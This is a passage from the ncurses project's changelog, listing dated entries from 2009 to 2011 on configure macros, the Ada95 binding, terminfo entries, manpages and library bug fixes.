and test directories, for test 1111 builds. 1112 + update test/configure macros CF_CURSES_LIBS, CF_XOPEN_SOURCE and 1113 CF_X_ATHENA_LIBS. 1114 + add configure check to determine if gnat's project feature supports 1115 libraries, i.e., collections of .ali files. 1116 + make all dereferences in Ada95 samples explicit. 1117 + fix typo in comment in lib_add_wch.c (patch by Petr Pavlu). 1118 + add configure check for, ifdef's for math.h which is in a separate 1119 package on Solaris and potentially not installed (report by Petr 1120 Pavlu). 1121 > fixes for Ada95 binding (Nicolas Boulenguez): 1122 + improve type-checking in Ada95 by eliminating a few warning-suppress 1123 pragmas. 1124 + suppress unreferenced warnings. 1125 + make all dereferences in binding explicit. 1126 1127 20110319 1128 + regen Ada html documentation. 1129 + change order of -I options from ncurses*-config script when the 1130 --disable-overwrite option was used, so that the subdirectory include 1131 is listed first. 1132 + modify the make-tar.sh scripts to add a MANIFEST and NEWS file. 1133 + modify configure script to provide value for HTML_DIR in 1134 Ada95/gen/Makefile.in, which depends on whether the Ada95 binding is 1135 distributed separately (report by Nicolas Boulenguez). 1136 + modify configure script to add "-g" and/or "-O3" to ADAFLAGS if the 1137 CFLAGS for the build has these options. 1138 + amend change from 20070324, to not add 1 to the result of getmaxx 1139 and getmaxy in the Ada binding (report by Nicolas Boulenguez for 1140 thread in comp.lang.ada). 1141 + build-fix Ada95/samples for gnat 4.5 1142 + spelling fixes for Ada95/samples/explain.txt 1143 > fixes for Ada95 binding (Nicolas Boulenguez): 1144 + add item in Trace_Attribute_Set corresponding to TRACE_ATTRS. 1145 + add workaround for binding to set_field_type(), which uses varargs. 1146 The original binding from 990220 relied on the prevalent 1147 implementation of varargs which did not support or need va_copy(). 1148 + add dependency on gen/Makefile.in needed for *-panels.ads 1149 + add Library_Options to library.gpr 1150 + add Languages to library.gpr, for gprbuild 1151 1152 20110307 1153 + revert changes to limit-checks from 20110122 (Debian #616711). 1154 > minor type-cleanup of Ada95 binding (Nicolas Boulenguez): 1155 + corrected a minor sign error in a field of Low_Level_Field_Type, to 1156 conform to form.h. 1157 + replaced C_Int by Curses_Bool as return type for some callbacks, see 1158 fieldtype(3FORM). 1159 + modify samples/sample-explain.adb to provide explicit message when 1160 explain.txt is not found. 1161 1162 20110305 1163 + improve makefiles for Ada95 tree (patch by Nicolas Boulenguez). 1164 + fix an off-by-one error in _nc_slk_initialize() from 20100605 fixes 1165 for compiler warnings (report by Nicolas Boulenguez). 1166 + modify Ada95/gen/gen.c to declare unused bits in generated layouts, 1167 needed to compile when chtype is 64-bits using gnat 4.4.5 1168 1169 20110226 5.8 release for upload to 1170 1171 20110226 1172 + update release notes, for 5.8. 1173 + regenerated html manpages. 1174 + change open() in _nc_read_file_entry() to fopen() for consistency 1175 with write_file(). 1176 + modify misc/run_tic.in to create parent directory, in case this is 1177 a new install of hashed database. 1178 + fix typo in Ada95/mk-1st.awk which causes error with original awk. 1179 1180 20110220 1181 + configure script rpath fixes from xterm #269. 1182 + workaround for cygwin's non-functional features.h, to force ncurses' 1183 configure script to define _XOPEN_SOURCE_EXTENDED when building 1184 wide-character configuration. 1185 + build-fix in run_tic.sh for OS/2 EMX install 1186 + add cons25-debian entry (patch by Brian M Carlson, Debian #607662). 1187 1188 20110212 1189 + regenerated html manpages. 1190 + use _tracef() in show_where() function of tic, to work correctly with 1191 special case of trace configuration. 1192 1193 20110205 1194 + add xterm-utf8 entry as a demo of the U8 feature -TD 1195 + add U8 feature to denote entries for terminal emulators which do not 1196 support VT100 SI/SO when processing UTF-8 encoding -TD 1197 + improve the NCURSES_NO_UTF8_ACS feature by adding a check for an 1198 extended terminfo capability U8 (prompted by mailing list 1199 discussion). 1200 1201 20110122 1202 + start documenting interface changes for upcoming 5.8 release. 1203 + correct limit-checks in derwin(). 1204 + correct limit-checks in newwin(), to ensure that windows have nonzero 1205 size (report by Garrett Cooper). 1206 + fix a missing "weak" declaration for pthread_kill (patch by Nicholas 1207 Alcock). 1208 + improve documentation of KEY_ENTER in curs_getch.3x manpage (prompted 1209 by discussion with Kevin Martin). 1210 1211 20110115 1212 + modify Ada95/configure script to make the --with-curses-dir option 1213 work without requiring the --with-ncurses option. 1214 + modify test programs to allow them to be built with NetBSD curses. 1215 + document thick- and double-line symbols in curs_add_wch.3x manpage. 1216 + document WACS_xxx constants in curs_add_wch.3x manpage. 1217 + fix some warnings for clang 2.6 "--analyze" 1218 + modify Ada95 makefiles to make html-documentation with the project 1219 file configuration if that is used. 1220 + update config.guess, config.sub 1221 1222 20110108 1223 + regenerated html manpages. 1224 + minor fixes to enable lint when trace is not enabled, e.g., with 1225 clang --analyze. 1226 + fix typo in man/default_colors.3x (patch by Tim van der Molen). 1227 + update ncurses/llib-lncurses* 1228 1229 20110101 1230 + fix remaining strict compiler warnings in ncurses library ABI=5, 1231 except those dealing with function pointers, etc. 1232 1233 20101225 1234 + modify nc_tparm.h, adding guards against repeated inclusion, and 1235 allowing TPARM_ARG to be overridden. 1236 + fix some strict compiler warnings in ncurses library. 1237 1238 20101211 1239 + suppress ncv in screen entry, allowing underline (patch by Alejandro 1240 R Sedeno). 1241 + also suppress ncv in konsole-base -TD 1242 + fixes in wins_nwstr() and related functions to ensure that special 1243 characters, i.e., control characters are handled properly with the 1244 wide-character configuration. 1245 + correct a comparison in wins_nwstr() (Redhat #661506). 1246 + correct help-messages in some of the test-programs, which still 1247 referred to quitting with 'q'. 1248 1249 20101204 1250 + add special case to _nc_infotocap() to recognize the setaf/setab 1251 strings from xterm+256color and xterm+88color, and provide a reduced 1252 version which works with termcap. 1253 + remove obsolete emacs "Local Variables" section from documentation 1254 (request by Sven Joachim). 1255 + update doc/html/index.html to include NCURSES-Programming-HOWTO.html 1256 (report by Sven Joachim). 1257 1258 20101128 1259 + modify test/configure and test/Makefile.in to handle this special 1260 case of building within a build-tree (Debian #34182): 1261 mkdir -p build && cd build && ../test/configure && make 1262 1263 20101127 1264 + miscellaneous build-fixes for Ada95 and test-directories when built 1265 out-of-tree. 1266 + use VPATH in makefiles to simplify out-of-tree builds (Debian #34182). 1267 + fix typo in rmso for tek4106 entry -Goran Weinholt 1268 1269 20101120 1270 + improve checks in test/configure for X libraries, from xterm #267 1271 changes. 1272 + modify test/configure to allow it to use the build-tree's libraries 1273 e.g., when using that to configure the test-programs without the 1274 rpath feature (request by Sven Joachim). 1275 + repurpose "gnome" terminfo entries as "vte", retaining "gnome" items 1276 for compatibility, but generally deprecating those since the VTE 1277 library is what actually defines the behavior of "gnome", etc., 1278 since 2003 -TD 1279 1280 20101113 1281 + compiler warning fixes for test programs. 1282 + various build-fixes for test-programs with pdcurses. 1283 + updated configure checks for X packages in test/configure from xterm 1284 #267 changes. 1285 + add configure check to gnatmake, to accommodate cygwin. 1286 1287 20101106 1288 + correct list of sub-directories needed in Ada95 tree for building as 1289 a separate package. 1290 + modify scripts in test-directory to improve builds as a separate 1291 package. 1292 1293 20101023 1294 + correct parsing of relative tab-stops in tabs program (report by 1295 Philip Ganchev). 1296 + adjust configure script so that "t" is not added to library suffix 1297 when weak-symbols are used, allowing the pthread configuration to 1298 more closely match the non-thread naming (report by Werner Fink). 1299 + modify configure check for tic program, used for fallbacks, to a 1300 warning if not found. This makes it simpler to use additonal 1301 scripts to bootstrap the fallbacks code using tic from the build 1302 tree (report by Werner Fink). 1303 + fix several places in configure script using ${variable-value} form. 1304 + modify configure macro CF_LDFLAGS_STATIC to accommodate some loaders 1305 which do not support selectively linking against static libraries 1306 (report by John P. Hartmann) 1307 + fix an unescaped dash in man/tset.1 (report by Sven Joachim). 1308 1309 20101009 1310 + correct comparison used for setting 16-colors in linux-16color 1311 entry (Novell #644831) -TD 1312 + improve linux-16color entry, using "dim" for color-8 which makes it 1313 gray rather than black like color-0 -TD 1314 + drop misc/ncu-indent and misc/jpf-indent; they are provided by an 1315 external package "cindent". 1316 1317 20101002 1318 + improve linkages in html manpages, adding references to the newer 1319 pages, e.g., *_variables, curs_sp_funcs, curs_threads. 1320 + add checks in tic for inconsistent cursor-movement controls, and for 1321 inconsistent printer-controls. 1322 + fill in no-parameter forms of cursor-movement where a parameterized 1323 form is available -TD 1324 + fill in missing cursor controls where the form of the controls is 1325 ANSI -TD 1326 + fix inconsistent punctuation in form_variables manpage (patch by 1327 Sven Joachim). 1328 + add parameterized cursor-controls to linux-basic (report by Dae) -TD 1329 > patch by Juergen Pfeifer: 1330 + document how to build 32-bit libraries in README.MinGW 1331 + fixes to filename computation in mk-dlls.sh.in 1332 + use POSIX locale in mk-dlls.sh.in rather than en_US (report by Sven 1333 Joachim). 1334 + add a check in mk-dlls.sh.in to obtain the size of a pointer to 1335 distinguish between 32-bit and 64-bit hosts. The result is stored 1336 in mingw_arch 1337 1338 20100925 1339 + add "XT" capability to entries for terminals that support both 1340 xterm-style mouse- and title-controls, for "screen" which 1341 special-cases TERM beginning with "xterm" or "rxvt" -TD 1342 > patch by Juergen Pfeifer: 1343 + use 64-Bit MinGW toolchain (recommended package from TDM, see 1344 README.MinGW). 1345 + support pthreads when using the TDM MinGW toolchain 1346 1347 20100918 1348 + regenerated html manpages. 1349 + minor fixes for symlinks to curs_legacy.3x and curs_slk.3x manpages. 1350 + add manpage for sp-funcs. 1351 + add sp-funcs to test/listused.sh, for documentation aids. 1352 1353 20100911 1354 + add manpages for summarizing public variables of curses-, terminfo- 1355 and form-libraries. 1356 + minor fixes to manpages for consistency (patch by Jason McIntyre). 1357 + modify tic's -I/-C dump to reformat acsc strings into canonical form 1358 (sorted, unique mapping) (cf: 971004). 1359 + add configure check for pthread_kill(), needed for some old 1360 platforms. 1361 1362 20100904 1363 + add configure option --without-tests, to suppress building test 1364 programs (request by Frederic L W Meunier). 1365 1366 20100828 1367 + modify nsterm, xnuppc and tek4115 to make sgr/sgr0 consistent -TD 1368 + add check in terminfo source-reader to provide more informative 1369 message when someone attempts to run tic on a compiled terminal 1370 description (prompted by Debian #593920). 1371 + note in infotocap and captoinfo manpages that they read terminal 1372 descriptions from text-files (Debian #593920). 1373 + improve acsc string for vt52, show arrow keys (patch by Benjamin 1374 Sittler). 1375 1376 20100814 1377 + document in manpages that "mv" functions first use wmove() to check 1378 the window pointer and whether the position lies within the window 1379 (suggested by Poul-Henning Kamp). 1380 + fixes to curs_color.3x, curs_kernel.3x and wresize.3x manpages (patch 1381 by Tim van der Molen). 1382 + modify configure script to transform library names for tic- and 1383 tinfo-libraries so that those build properly with Mac OS X shared 1384 library configuration. 1385 + modify configure script to ensure that it removes conftest.dSYM 1386 directory leftover on checks with Mac OS X. 1387 + modify configure script to cleanup after check for symbolic links. 1388 1389 20100807 1390 + correct a typo in mk-1st.awk (patch by Gabriele Balducci) 1391 (cf: 20100724) 1392 + improve configure checks for location of tic and infocmp programs 1393 used for installing database and for generating fallback data, 1394 e.g., for cross-compiling. 1395 + add Markus Kuhn's wcwidth function for compiling MinGW 1396 + add special case to CF_REGEX for cross-compiling to MinGW target. 1397 1398 20100731 1399 + modify initialization check for win32con driver to eliminate need for 1400 special case for TERM "unknown", using terminal database if available 1401 (prompted by discussion with Roumen Petrov). 1402 + for MinGW port, ensure that terminal driver is setup if tgetent() 1403 is called (patch by Roumen Petrov). 1404 + document tabs "-0" and "-8" options in manpage. 1405 + fix Debian "lintian" issues with manpages reported in 1406 1407 1408 20100724 1409 + add a check in tic for missing set_tab if clear_all_tabs given. 1410 + improve use of symbolic links in makefiles by using "-f" option if 1411 it is supported, to eliminate temporary removal of the target 1412 (prompted by) 1413 + minor improvement to test/ncurses.c, reset color pairs in 'd' test 1414 after exit from 'm' main-menu command. 1415 + improved ncu-indent, from mawk changes, allows more than one of 1416 GCC_NORETURN, GCC_PRINTFLIKE and GCC_SCANFLIKE on a single line. 1417 1418 20100717 1419 + add hard-reset for rs2 to wsvt25 to help ensure that reset ends 1420 the alternate character set (patch by Nicholas Marriott) 1421 + remove tar-copy.sh and related configure/Makefile chunks, since the 1422 Ada95 binding is now installed using rules in Ada95/src. 1423 1424 20100703 1425 + continue integrating changes to use gnatmake project files in Ada95 1426 + add/use configure check to turn on project rules for Ada95/src. 1427 + revert the vfork change from 20100130, since it does not work. 1428 1429 20100626 1430 + continue integrating changes to use gnatmake project files in Ada95 1431 + old gnatmake (3.15) does not produce libraries using project-file; 1432 work around by adding script to generate alternate makefile. 1433 1434 20100619 1435 + continue integrating changes to use gnatmake project files in Ada95 1436 + add configure --with-ada-sharedlib option, for the test_make rule. 1437 + move Ada95-related logic into aclocal.m4, since additional checks 1438 will be needed to distinguish old/new implementations of gnat. 1439 1440 20100612 1441 + start integrating changes to use gnatmake project files in Ada95 tree 1442 + add test_make / test_clean / test_install rules in Ada95/src 1443 + change install-path for adainclude directory to /usr/share/ada (was 1444 /usr/lib/ada). 1445 + update Ada95/configure. 1446 + add mlterm+256color entry, for mlterm 3.0.0 -TD 1447 + modify test/configure to use macros to ensure consistent order 1448 of updating LIBS variable. 1449 1450 20100605 1451 + change search order of options for Solaris in CF_SHARED_OPTS, to 1452 work with 64-bit compiles. 1453 + correct quoting of assignment in CF_SHARED_OPTS case for aix 1454 (cf: 20081227) 1455 1456 20100529 1457 + regenerated html documentation. 1458 + modify test/configure to support pkg-config for checking X libraries 1459 used by PDCurses. 1460 + add/use configure macro CF_ADD_LIB to force consistency of 1461 assignments to $LIBS, etc. 1462 + fix configure script for combining --with-pthread 1463 and --enable-weak-symbols options. 1464 1465 20100522 1466 + correct cross-compiling configure check for CF_MKSTEMP macro, by 1467 adding a check cache variable set by AC_CHECK_FUNC (report by 1468 Pierre Labastie). 1469 + simplify include-dependencies of make_hash and make_keys, to reduce 1470 the need for setting BUILD_CPPFLAGS in cross-compiling when the 1471 build- and target-machines differ. 1472 + repair broken-linker configuration by restoring a definition of SP 1473 variable to curses.priv.h, and adjusting for cases where sp-funcs 1474 are used. 1475 + improve configure macro CF_AR_FLAGS, allowing ARFLAGS environment 1476 variable to override (prompted by report by Pablo Cazallas). 1477 1478 20100515 1479 + add configure option --enable-pthreads-eintr to control whether the 1480 new EINTR feature is enabled. 1481 + modify logic in pthread configuration to allow EINTR to interrupt 1482 a read operation in wgetch() (Novell #540571, patch by Werner Fink). 1483 + drop mkdirs.sh, use "mkdir -p". 1484 + add configure option --disable-libtool-version, to use the 1485 "-version-number" feature which was added in libtool 1.5 (report by 1486 Peter Haering). The default value for the option uses the newer 1487 feature, which makes libraries generated using libtool compatible 1488 with the standard builds of ncurses. 1489 + updated test/configure to match configure script macros. 1490 + fixes for configure script from lynx changes: 1491 + improve CF_FIND_LINKAGE logic for the case where a function is 1492 found in predefined libraries. 1493 + revert part of change to CF_HEADER (cf: 20100424) 1494 1495 20100501 1496 + correct limit-check in wredrawln, accounting for begy/begx values 1497 (patch by David Benjamin). 1498 + fix most compiler warnings from clang. 1499 + amend build-fix for OpenSolaris, to ensure that a system header is 1500 included in curses.h before testing feature symbols, since they 1501 may be defined by that route. 1502 1503 20100424 1504 + fix some strict compiler warnings in ncurses library. 1505 + modify configure macro CF_HEADER_PATH to not look for variations in 1506 the predefined include directories. 1507 + improve configure macros CF_GCC_VERSION and CF_GCC_WARNINGS to work 1508 with gcc 4.x's c89 alias, which gives warning messages for cases 1509 where older versions would produce an error. 1510 1511 20100417 1512 + modify _nc_capcmp() to work with cancelled strings. 1513 + correct translation of "^" in _nc_infotocap(), used to transform 1514 terminfo to termcap strings 1515 + add configure --disable-rpath-hack, to allow disabling the feature 1516 which adds rpath options for libraries in unusual places. 1517 + improve CF_RPATH_HACK_2 by checking if the rpath option for a given 1518 directory was already added. 1519 + improve CF_RPATH_HACK_2 by using ldd to provide a standard list of 1520 directories (which will be ignored). 1521 1522 20100410 1523 + improve win_driver.c handling of mouse: 1524 + discard motion events 1525 + avoid calling _nc_timed_wait when there is a mouse event 1526 + handle 4th and "rightmost" buttons. 1527 + quote substitutions in CF_RPATH_HACK_2 configure macro, needed for 1528 cases where there are embedded blanks in the rpath option. 1529 1530 20100403 1531 + add configure check for exctags vs ctags, to work around pkgsrc. 1532 + simplify logic in _nc_get_screensize() to make it easier to see how 1533 environment variables may override system- and terminfo-values 1534 (prompted by discussion with Igor Bujna). 1535 + make debug-traces for COLOR_PAIR and PAIR_NUMBER less verbose. 1536 + improve handling of color-pairs embedded in attributes for the 1537 extended-colors configuration. 1538 + modify MKlib_gen.sh to build link_test with sp-funcs. 1539 + build-fixes for OpenSolaris aka Solaris 11, for wide-character 1540 configuration as well as for rpath feature in *-config scripts. 1541 1542 20100327 1543 + refactor CF_SHARED_OPTS configure macro, making CF_RPATH_HACK more 1544 reusable. 1545 + improve configure CF_REGEX, similar fixes. 1546 + improve configure CF_FIND_LINKAGE, adding add check between system 1547 (default) and explicit paths, where we can find the entrypoint in the 1548 given library. 1549 + add check if Gpm_Open() returns a -2, e.g., for "xterm". This is 1550 normally suppressed but can be overridden using $NCURSES_GPM_TERMS. 1551 Ensure that Gpm_Close() is called in this case. 1552 1553 20100320 1554 + rename atari and st52 terminfo entries to atari-old, st52-old, use 1555 newer entries from FreeMiNT by Guido Flohr (from patch/report by Alan 1556 Hourihane). 1557 1558 20100313 1559 + modify install-rule for manpages so that *-config manpages will 1560 install when building with --srcdir (report by Sven Joachim). 1561 + modify CF_DISABLE_LEAKS configure macro so that the --enable-leaks 1562 option is not the same as --disable-leaks (GenToo #305889). 1563 + modify #define's for build-compiler to suppress cchar_t symbol from 1564 compile of make_hash and make_keys, improving cross-compilation of 1565 ncursesw (report by Bernhard Rosenkraenzer). 1566 + modify CF_MAN_PAGES configure macro to replace all occurrences of 1567 TPUT in tput.1's manpage (Debian #573597, report/analysis by Anders 1568 Kaseorg). 1569 1570 20100306 1571 + generate manpages for the *-config scripts, adapted from help2man 1572 (suggested by Sven Joachim). 1573 + use va_copy() in _nc_printf_string() to avoid conflicting use of 1574 va_list value in _nc_printf_length() (report by Wim Lewis). 1575 1576 20100227 1577 + add Ada95/configure script, to use in tar-file created by 1578 Ada95/make-tar.sh 1579 + fix typo in wresize.3x (patch by Tim van der Molen). 1580 + modify screen-bce.XXX entries to exclude ech, since screen's color 1581 model does not clear with color for that feature -TD 1582 1583 20100220 1584 + add make-tar.sh scripts to Ada95 and test subdirectories to help with 1585 making those separately distributable. 1586 + build-fix for static libraries without dlsym (Debian #556378). 1587 + fix a syntax error in man/form_field_opts.3x (patch by Ingo 1588 Schwarze). 1589 1590 20100213 1591 + add several screen-bce.XXX entries -TD 1592 1593 20100206 1594 + update mrxvt terminfo entry -TD 1595 + modify win_driver.c to support mouse single-clicks. 1596 + correct name for termlib in ncurses*-config, e.g., if it is renamed 1597 to provide a single file for ncurses/ncursesw libraries (patch by 1598 Miroslav Lichvar). 1599 1600 20100130 1601 + use vfork in test/ditto.c if available (request by Mike Frysinger). 1602 + miscellaneous cleanup of manpages. 1603 + fix typo in curs_bkgd.3x (patch by Tim van der Molen). 1604 + build-fix for --srcdir (patch by Miroslav Lichvar). 1605 1606 20100123 1607 + for term-driver configuration, ensure that the driver pointer is 1608 initialized in setupterm so that terminfo/termcap programs work. 1609 + amend fix for Debian #542031 to ensure that wattrset() returns only 1610 OK or ERR, rather than the attribute value (report by Miroslav 1611 Lichvar). 1612 + reorder WINDOWLIST to put WINDOW data after SCREEN pointer, making 1613 _nc_screen_of() compatible between normal/wide libraries again (patch 1614 by Miroslav Lichvar) 1615 + review/fix include-dependencies in modules files (report by Miroslav 1616 Lichvar). 1617 1618 20100116 1619 + modify win_driver.c to initialize acs_map for win32 console, so 1620 that line-drawing works. 1621 + modify win_driver.c to initialize TERMINAL struct so that programs 1622 such as test/lrtest.c and test/ncurses.c which test string 1623 capabilities can run. 1624 + modify term-driver modules to eliminate forward-reference 1625 declarations. 1626 1627 20100109 1628 + modify configure macro CF_XOPEN_SOURCE, etc., to use CF_ADD_CFLAGS 1629 consistently to add new -D's while removing duplicates. 1630 + modify a few configure macros to consistently put new options 1631 before older in the list. 1632 + add tiparm(), based on review of X/Open Curses Issue 7. 1633 + minor documentation cleanup. 1634 + update config.guess, config.sub from 1635 1636 (caveat - its maintainer put 2010 copyright date on files dated 2009) 1637 1638 20100102 1639 + minor improvement to tic's checking of similar SGR's to allow for the 1640 most common case of SGR 0. 1641 + modify getmouse() to act as its documentation implied, returning on 1642 each call the preceding event until none are left. When no more 1643 events remain, it will return ERR. 1644 1645 20091227 1646 + change order of lookup in progs/tput.c, looking for terminfo data 1647 first. This fixes a confusion between termcap "sg" and terminfo 1648 "sgr" or "sgr0", originally from 990123 changes, but exposed by 1649 20091114 fixes for hashing. With this change, only "dl" and "ed" are 1650 ambiguous (Mandriva #56272). 1651 1652 20091226 1653 + add bterm terminfo entry, based on bogl 0.1.18 -TD 1654 + minor fix to rxvt+pcfkeys terminfo entry -TD 1655 + build-fixes for Ada95 tree for gnat 4.4 "style". 1656 1657 20091219 1658 + remove old check in mvderwin() which prevented moving a derived 1659 window whose origin happened to coincide with its parent's origin 1660 (report by Katarina Machalkova). 1661 + improve test/ncurses.c to put mouse droppings in the proper window. 1662 + update minix terminfo entry -TD 1663 + add bw (auto-left-margin) to nsterm* entries (Benjamin Sittler) 1664 1665 20091212 1666 + correct transfer of multicolumn characters in multirow 1667 field_buffer(), which stopped at the end of the first row due to 1668 filling of unused entries in a cchar_t array with nulls. 1669 + updated nsterm* entries (Benjamin Sittler, Emanuele Giaquinta) 1670 + modify _nc_viscbuf2() and _tracecchar_t2() to show wide-character 1671 nulls. 1672 + use strdup() in set_menu_mark(), restore .marklen struct member on 1673 failure. 1674 + eliminate clause 3 from the UCB copyrights in read_termcap.c and 1675 tset.c per 1676 1677 (patch by Nicholas Marriott). 1678 + replace a malloc in tic.c with strdup, checking for failure (patch by 1679 Nicholas Marriott). 1680 + update config.guess, config.sub from 1681 1682 1683 20091205 1684 + correct layout of working window used to extract data in 1685 wide-character configured by set_field_buffer (patch by Rafael 1686 Garrido Fernandez) 1687 + improve some limit-checks related to filename length in reading and 1688 writing terminfo entries. 1689 + ensure that filename is always filled in when attempting to read 1690 a terminfo entry, so that infocmp can report the filename (patch 1691 by Nicholas Marriott). 1692 1693 20091128 1694 + modify mk-1st.awk to allow tinfo library to be built when term-driver 1695 is enabled. 1696 + add error-check to configure script to ensure that sp-funcs is 1697 enabled if term-driver is, since some internal interfaces rely upon 1698 this. 1699 1700 20091121 1701 + fix case where progs/tput is used while sp-funcs is configure; this 1702 requires save/restore of out-character function from _nc_prescreen 1703 rather than the SCREEN structure (report by Charles Wilson). 1704 + fix typo in man/curs_trace.3x which caused incorrect symbolic links 1705 + improved configure macros CF_GCC_ATTRIBUTES, CF_PROG_LINT. 1706 1707 20091114 1708 1709 + updated man/curs_trace.3x 1710 + limit hashing for termcap-names to 2-characters (Ubuntu #481740). 1711 + change a variable name in lib_newwin.c to make it clearer which 1712 value is being freed on error (patch by Nicholas Marriott). 1713 1714 20091107 1715 + improve test/ncurses.c color-cycling test by reusing attribute- 1716 and color-cycling logic from the video-attributes screen. 1717 + add ifdef'd with NCURSES_INTEROP_FUNCS experimental bindings in form 1718 library which help make it compatible with interop applications 1719 (patch by Juergen Pfeifer). 1720 + add configure option --enable-interop, for integrating changes 1721 for generic/interop support to form-library by Juergen Pfeifer 1722 1723 20091031 1724 + modify use of $CC environment variable which is defined by X/Open 1725 as a curses feature, to ignore it if it is not a single character 1726 (prompted by discussion with Benjamin C W Sittler). 1727 + add START_TRACE in slk_init 1728 + fix a regression in _nc_ripoffline which made test/ncurses.c not show 1729 soft-keys, broken in 20090927 merging. 1730 + change initialization of "hidden" flag for soft-keys from true to 1731 false, broken in 20090704 merging (Ubuntu #464274). 1732 + update nsterm entries (patch by Benjamin C W Sittler, prompted by 1733 discussion with Fabian Groffen in GenToo #206201). 1734 + add test/xterm-256color.dat 1735 1736 20091024 1737 + quiet some pedantic gcc warnings. 1738 + modify _nc_wgetch() to check for a -1 in the fifo, e.g., after a 1739 SIGWINCH, and discard that value, to avoid confusing application 1740 (patch by Eygene Ryabinkin, FreeBSD bin/136223). 1741 1742 20091017 1743 + modify handling of $PKG_CONFIG_LIBDIR to use only the first item in 1744 a possibly colon-separated list (Debian #550716). 1745 1746 20091010 1747 + supply a null-terminator to buffer in _nc_viswibuf(). 1748 + fix a sign-extension bug in unget_wch() (report by Mike Gran). 1749 + minor fixes to error-returns in default function for tputs, as well 1750 as in lib_screen.c 1751 1752 20091003 1753 + add WACS_xxx definitions to wide-character configuration for thick- 1754 and double-lines (discussion with Slava Zanko). 1755 + remove unnecessary kcan assignment to ^C from putty (Sven Joachim) 1756 + add ccc and initc capabilities to xterm-16color -TD 1757 > patch by Benjamin C W Sittler: 1758 + add linux-16color 1759 + correct initc capability of linux-c-nc end-of-range 1760 + similar change for dg+ccc and dgunix+ccc 1761 1762 20090927 1763 + move leak-checking for comp_captab.c into _nc_leaks_tinfo() since 1764 that module since 20090711 is in libtinfo. 1765 + add configure option --enable-term-driver, to allow compiling with 1766 terminal-driver. That is used in MinGW port, and (being somewhat 1767 more complicated) is an experimental alternative to the conventional 1768 termlib internals. Currently, it requires the sp-funcs feature to 1769 be enabled. 1770 + completed integrating "sp-funcs" by Juergen Pfeifer in ncurses 1771 library (some work remains for forms library). 1772 1773 20090919 1774 + document return code from define_key (report by Mike Gran). 1775 + make some symbolic links in the terminfo directory-tree shorter 1776 (patch by Daniel Jacobowitz, forwarded by Sven Joachim).). 1777 + fix some groff warnings in terminfo.5, etc., from recent Debian 1778 changes. 1779 + change ncv and op capabilities in sun-color terminfo entry to match 1780 Sun's entry for this (report by Laszlo Peter). 1781 + improve interix smso terminfo capability by using reverse rather than 1782 bold (report by Kristof Zelechovski). 1783 1784 20090912 1785 + add some test programs (and make these use the same special keys 1786 by sharing linedata.h functions): 1787 test/test_addstr.c 1788 test/test_addwstr.c 1789 test/test_addchstr.c 1790 test/test_add_wchstr.c 1791 + correct internal _nc_insert_ch() to use _nc_insert_wch() when 1792 inserting wide characters, since the wins_wch() function that it used 1793 did not update the cursor position (report by Ciprian Craciun). 1794 1795 20090906 1796 + fix typo s/is_timeout/is_notimeout/ which made "man is_notimeout" not 1797 work. 1798 + add null-pointer checks to other opaque-functions. 1799 + add is_pad() and is_subwin() functions for opaque access to WINDOW 1800 (discussion with Mark Dickinson). 1801 + correct merge to lib_newterm.c, which broke when sp-funcs was 1802 enabled. 1803 1804 20090905 1805 + build-fix for building outside source-tree (report by Sven Joachim). 1806 + fix Debian lintian warning for man/tabs.1 by making section number 1807 agree with file-suffix (report by Sven Joachim). 1808 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1809 1810 20090829 1811 + workaround for bug in g++ 4.1-4.4 warnings for wattrset() macro on 1812 amd64 (Debian #542031). 1813 + fix typo in curs_mouse.3x (Debian #429198). 1814 1815 20090822 1816 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1817 1818 20090815 1819 + correct use of terminfo capabilities for initializing soft-keys, 1820 broken in 20090509 merging. 1821 + modify wgetch() to ensure it checks SIGWINCH when it gets an error 1822 in non-blocking mode (patch by Clemens Ladisch). 1823 + use PATH_SEPARATOR symbol when substituting into run_tic.sh, to 1824 help with builds on non-Unix platforms such as OS/2 EMX. 1825 + modify scripting for misc/run_tic.sh to test configure script's 1826 $cross_compiling variable directly rather than comparing host/build 1827 compiler names (prompted by comment in GenToo #249363). 1828 + fix configure script option --with-database, which was coded as an 1829 enable-type switch. 1830 + build-fixes for --srcdir (report by Frederic L W Meunier). 1831 1832 20090808 1833 + separate _nc_find_entry() and _nc_find_type_entry() from 1834 implementation details of hash function. 1835 1836 20090803 1837 + add tabs.1 to man/man_db.renames 1838 + modify lib_addch.c to compensate for removal of wide-character test 1839 from unctrl() in 20090704 (Debian #539735). 1840 1841 20090801 1842 + improve discussion in INSTALL for use of system's tic/infocmp for 1843 cross-compiling and building fallbacks. 1844 + modify test/demo_termcap.c to correspond better to options in 1845 test/demo_terminfo.c 1846 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1847 + fix logic for 'V' in test/ncurses.c tests f/F. 1848 1849 20090728 1850 + correct logic in tigetnum(), which caused tput program to treat all 1851 string capabilities as numeric (report by Rajeev V Pillai, 1852 cf: 20090711). 1853 1854 20090725 1855 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1856 1857 20090718 1858 + fix a null-pointer check in _nc_format_slks() in lib_slk.c, from 1859 20070704 changes. 1860 + modify _nc_find_type_entry() to use hashing. 1861 + make CCHARW_MAX value configurable, noting that changing this would 1862 change the size of cchar_t, and would be ABI-incompatible. 1863 + modify test-programs, e.g,. test/view.c, to address subtle 1864 differences between Tru64/Solaris and HPUX/AIX getcchar() return 1865 values. 1866 + modify length returned by getcchar() to count the trailing null 1867 which is documented in X/Open (cf: 20020427). 1868 + fixes for test programs to build/work on HPUX and AIX, etc. 1869 1870 20090711 1871 + improve performance of tigetstr, etc., by using hashing code from tic. 1872 + minor fixes for memory-leak checking. 1873 + add test/demo_terminfo, for comparison with demo_termcap 1874 1875 20090704 1876 + remove wide-character checks from unctrl() (patch by Clemens Ladisch). 1877 + revise wadd_wch() and wecho_wchar() to eliminate dependency on 1878 unctrl(). 1879 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1880 1881 20090627 1882 + update llib-lncurses[wt] to use sp-funcs. 1883 + various code-fixes to build/work with --disable-macros configure 1884 option. 1885 + add several new files from Juergen Pfeifer which will be used when 1886 integration of "sp-funcs" is complete. This includes a port to 1887 MinGW. 1888 1889 20090613 1890 + move definition for NCURSES_WRAPPED_VAR back to ncurses_dll.h, to 1891 make includes of term.h without curses.h work (report by "Nix"). 1892 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1893 1894 20090607 1895 + fix a regression in lib_tputs.c, from ongoing merges. 1896 1897 20090606 